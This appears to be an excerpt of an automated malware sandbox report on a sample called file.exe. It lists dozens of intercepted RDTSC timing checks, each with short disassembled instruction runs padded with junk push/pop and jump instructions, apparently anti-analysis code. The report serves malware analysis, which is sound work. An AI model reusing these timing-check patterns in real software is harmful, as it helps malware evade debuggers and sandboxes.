                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9CC77 second address: A9CC99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jnp 00007F3778D7B2B6h 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F3778D7B2BDh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C203 second address: A9C207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C62F second address: A9C633 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C633 second address: A9C63D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C63D second address: A9C644 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C644 second address: A9C685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3778D7C026h 0x0000000a jmp 00007F3778D7C02Eh 0x0000000f popad 0x00000010 jmp 00007F3778D7C02Dh 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 jne 00007F3778D7C02Ch 0x0000001e push ecx 0x0000001f jp 00007F3778D7C026h 0x00000025 pop ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C685 second address: A9C69C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3778D7B2C3h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C69C second address: A9C6B5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3778D7C026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jmp 00007F3778D7C02Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C7FC second address: A9C81D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3778D7B2C6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C81D second address: A9C829 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C829 second address: A9C837 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3778D7B2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52D31 second address: A52D37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA194F second address: AA1953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1953 second address: AA196B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3778D7C02Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4F7E second address: AA4F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4F82 second address: AA4F86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4F86 second address: AA4F8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4F8C second address: AA4F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5233 second address: AA52A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7B2BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007F3778D7B2C6h 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop edi 0x00000012 jc 00007F3778D7B2C0h 0x00000018 jmp 00007F3778D7B2BAh 0x0000001d jno 00007F3778D7B2BCh 0x00000023 popad 0x00000024 pushad 0x00000025 push ebx 0x00000026 jmp 00007F3778D7B2C5h 0x0000002b pop ebx 0x0000002c jmp 00007F3778D7B2BAh 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA52A2 second address: AA52A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA52A8 second address: AA52AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA8C5F second address: AA8C65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA8C65 second address: AA8C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB02BF second address: AB02C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB02C5 second address: AB02E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3778D7B2B6h 0x0000000a popad 0x0000000b jmp 00007F3778D7B2C2h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB02E7 second address: AB030B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7C02Ah 0x00000007 jmp 00007F3778D7C032h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB030B second address: AB0311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB0311 second address: AB0339 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F3778D7C031h 0x0000000e je 00007F3778D7C026h 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAE4F1 second address: AAE4F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAEE7C second address: AAEE80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAEE80 second address: AAEE86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAEE86 second address: AAEE90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAEE90 second address: AAEE94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAF419 second address: AAF42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F3778D7C026h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F3778D7C026h 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAF751 second address: AAF778 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7B2C1h 0x00000007 pushad 0x00000008 jmp 00007F3778D7B2C1h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAFF66 second address: AAFF73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jp 00007F3778D7C026h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAFF73 second address: AAFF7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAFF7B second address: AAFF83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4D0C second address: AB4D64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3778D7B2C7h 0x00000008 jmp 00007F3778D7B2C9h 0x0000000d jg 00007F3778D7B2B6h 0x00000013 jmp 00007F3778D7B2C6h 0x00000018 popad 0x00000019 jp 00007F3778D7B2C2h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB6445 second address: AB644A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9322 second address: AB932F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3778D7B2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB932F second address: AB9334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9334 second address: AB9355 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7B2BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnp 00007F3778D7B2BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB94B4 second address: AB94CC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3778D7C032h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9619 second address: AB9648 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7B2BFh 0x00000007 pushad 0x00000008 jmp 00007F3778D7B2C9h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB97F9 second address: AB9801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB994D second address: AB9987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jnp 00007F3778D7B2C8h 0x0000000b jmp 00007F3778D7B2C0h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jmp 00007F3778D7B2C9h 0x0000001b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9DDB second address: AB9DED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F3778D7C026h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9DED second address: AB9DF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9F66 second address: AB9F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9F6A second address: AB9F84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F3778D7B2B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007F3778D7B2BAh 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC3028 second address: AC302C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC302C second address: AC3030 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC370E second address: AC372A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007F3778D7C026h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jg 00007F3778D7C032h 0x00000014 jg 00007F3778D7C02Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC3B3D second address: AC3B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3778D7B2C8h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC3B59 second address: AC3B5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC3B5D second address: AC3B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC3CF9 second address: AC3D1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 ja 00007F3778D7C026h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F3778D7C034h 0x00000012 jmp 00007F3778D7C02Ch 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACAA52 second address: ACAA64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7B2BEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACAA64 second address: ACAA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACAA70 second address: ACAA75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACAA75 second address: ACAA88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3778D7C02Dh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACAA88 second address: ACAA95 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3778D7B2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6082 second address: AD6086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6086 second address: AD6094 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6094 second address: AD60B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7C033h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F3778D7C02Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD60B6 second address: AD60D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3778D7B2CCh 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD7F6D second address: AD7F8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3778D7C036h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD7F8B second address: AD7F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD80C9 second address: AD80D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 jbe 00007F3778D7C026h 0x0000000c pop edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD80D6 second address: AD80DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE07A2 second address: AE07A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE07A6 second address: AE07AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE07AC second address: AE07B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE07B9 second address: AE07C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ebx 0x00000007 push esi 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9491 second address: AE9495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9495 second address: AE94D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3778D7B2C8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F3778D7B2BCh 0x00000011 jnp 00007F3778D7B2B6h 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b pop edx 0x0000001c jp 00007F3778D7B2B6h 0x00000022 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEC36E second address: AEC380 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3778D7C026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F3778D7C02Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF24FF second address: AF2504 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2504 second address: AF250C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF250C second address: AF2519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F3778D7B2B6h 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2519 second address: AF251D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2992 second address: AF29DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007F3778D7B2C7h 0x0000000e pop ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 jmp 00007F3778D7B2C2h 0x00000017 jmp 00007F3778D7B2BFh 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2C9B second address: AF2CAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F3778D7C02Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2F20 second address: AF2F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF5394 second address: AF53B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3778D7C02Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnl 00007F3778D7C026h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF53B2 second address: AF53B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A09643 second address: A09649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A09649 second address: A09656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F3778D7B2BCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7C2B second address: AF7C2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7C2F second address: AF7C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFA460 second address: AFA46F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3778D7C026h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFA46F second address: AFA473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0288C second address: B02893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B07EC3 second address: B07EE9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F3778D7B2C1h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F3778D7B2B6h 0x0000001a rdtsc
